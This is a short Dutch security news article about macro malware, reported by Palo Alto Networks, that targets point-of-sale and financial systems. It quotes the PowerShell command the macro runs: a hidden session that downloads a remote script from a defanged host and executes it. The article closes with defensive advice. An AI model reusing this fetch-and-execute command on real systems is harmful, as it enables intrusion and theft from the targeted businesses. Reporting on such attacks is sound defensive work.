Palo Alto Networks merkt malware op die malafide macro's bedrijfsnetwerken probeert binnen te smokkelen. In die macro wordt dit stukje code aangesproken:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit -c if ([IntPtr]::size -eq 4) {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/cache') | iex } else {(new-object Net.WebClient).DownloadString('http://rabbitons[.]pw/css') | iex}

De url's zijn incompleet gemaakt door Palo Alto om het voorbeeld onschadelijk te maken.

Met andere woorden, er wordt een PowerShell-sessie opgestart die een PS-script binnenhaalt. Op zijn beurt brengt deze het systeem in kaart om te zien of het een aantrekkelijk doelwit is. De doelwitten van de malware zijn kassasystemen en andere systemen die financiële transacties uitvoeren. Zoals inmiddels ook gebruikelijk is, vermijdt de malware sandboxes en VM's, om langer onopgemerkt te blijven.

De problemen met PowerShell als tool om admintools tegen IT-systemen in te zetten is niet nieuw, maar worden goed gedemonstreerd met PowerShell Empire, dat in augustus vorig jaar verscheen. We schreven hier onlangs nog over, naar aanleiding van de voorspelling dat PS-aanvallen gemeengoed dreigen te worden in 2016.

IT-beheerders kunnen daarom maar beter overstappen op de afgelopen zomer verschenen versie 5 van PowerShell. Deze lost veelvoorkomende problemen op wat betreft uitvoeren van ongeautoriseerde scripts dankzij de integratie met AppLocker.